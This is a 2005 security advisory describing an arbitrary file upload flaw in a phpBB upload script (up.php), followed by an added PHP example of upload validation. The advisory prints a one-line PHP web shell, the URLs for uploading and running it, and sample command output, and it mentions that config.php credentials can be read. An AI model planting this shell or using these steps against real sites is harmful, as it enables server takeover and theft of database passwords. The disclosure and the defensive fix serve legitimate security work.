phpBBupload.txt

2005-04-17T00:00:00
ID PACKETSTORM:37080
Type packetstorm
Reporter Status-x
Modified 2005-04-17T00:00:00

Description

                                        
#####################################################################
  
Advisory #1 "phpBB Upload Script "up.php" Arbitrary File Upload"  
  
$ Author: Status-x  
$ Contact: phr4xz@gmail.com - status-x@hackersoft.net  
$ Date: 7 April 2005  
$ Website: http://defacers.com.mx  
$ Original Advisory: http://www.defacers.com.mx/advisories/2.txt  
$ Risk: High  
$ Vendor URL: http://phpbb.com  
  
$ Affected Software: phpBB 2.0.x  
  
Note: Sorry if it has been posted before  
  
#####################################################################  
  
-= Description =-  
  
phpBB is a forum system written in PHP that supports images, polls, private messages and more.
  
http://www.phpbb.com  
  
---------------------------------------------------------------------------  
  
-= Vulnerabilities =-  
  
  
- | "Arbitrary File Upload" |  
  
  
In phpBB forums there is a script that allows remote, registered users to upload files with arbitrary content and with any extension.
  
I didn't find any website where I could download the script, so I couldn't check who made it.
  
  
  
- | Examples: |  
  
  
We can create an example file to upload to the "test site":
  
  
<?  
  
system($cmd)  
  
?>  
  
  
We save it as cmd.php. Then we browse to:
  
--------------------------  
  
http://target/phpbb/up.php  
  
--------------------------  
  
  
There we upload our code. To see our file we just browse to:
  
-----------------------------------  
  
http://target/phpbb/uploads/cmd.php
  
-----------------------------------  
  
  
And we can see that our file has been uploaded:
  
  
  
Warning: system(): Cannot execute a blank command in   
/home/target/public_html/forum/uploads/tetx.php on line 2  
  
  
Then we can execute *NIX commands to obtain extremely compromising information, which could end with the "deface" of the affected site:
  
-----------------------------------------------------  
  
Linux SERVER 2.4.21-4.0.1.ELsmp #1 SMP  
Thu Oct 23 01:27:36 EDT 2003 i686 i686 i386 GNU/Linux  
/home/target/public_html/forum/uploads  
uid=32029(target) gid=530(target) groups=530(target)   
  
------------------------------------------------------  
  
This is just an example of what a malicious attacker can do.
  
  
- | "Password Disclosure" |  
  
  
A remote or local attacker can also read the config.php file, disclosing the information about the DB and possibly the FTP password.
  
  
------------------------------------------------------  
  
Example  
  
-= How to FIX =-  
  
Just filter the allowed extensions of the uploaded files in the up.php source.
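
An added example, not part of the original advisory and not the up.php source (which the advisory does not show): one way to apply the extension filter in PHP, extended beyond the advisory's fix with a content check and server-generated file names. The form field name "file", the storage directory and the allowed-type list are assumptions.

```php
<?php
// Added example: validation logic for an upload handler such as up.php.
// Assumptions (not from the advisory): form field "file", STORE_DIR,
// and the allowed-type list below.

const ALLOWED = [                 // extension => MIME type expected from content
    'png' => 'image/png',
    'jpg' => 'image/jpeg',
    'gif' => 'image/gif',
];
const MAX_BYTES = 2097152;        // 2 MiB
const STORE_DIR = '/var/forum-uploads';   // assumed path, outside the web root

function validate_upload(array $f): string
{
    if (($f['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($f['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Allowlist, not blocklist: cmd.php, cmd.phtml and cmd.php5 are all rejected.
    $ext = strtolower(pathinfo($f['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('extension not allowed');
    }
    // The client-supplied name and type are untrusted, so inspect the content:
    // a script renamed to cmd.jpg is detected as text, not image/jpeg.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($f['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // Server-generated name: the uploader never controls the stored filename.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

if (isset($_FILES['file'])) {
    try {
        $name = validate_upload($_FILES['file']);
        if (!move_uploaded_file($_FILES['file']['tmp_name'], STORE_DIR . '/' . $name)) {
            throw new RuntimeException('could not store file');
        }
        echo 'stored as ' . htmlspecialchars($name);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected: ' . htmlspecialchars($e->getMessage());
    }
}
```

If the upload directory has to stay under the web root, script execution should also be disabled for that directory in the web server configuration.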
  
  
-= Contact =-  
  
Status-x   
  
phr4xz@gmail.com  
  
http://www.defacers.com.mx  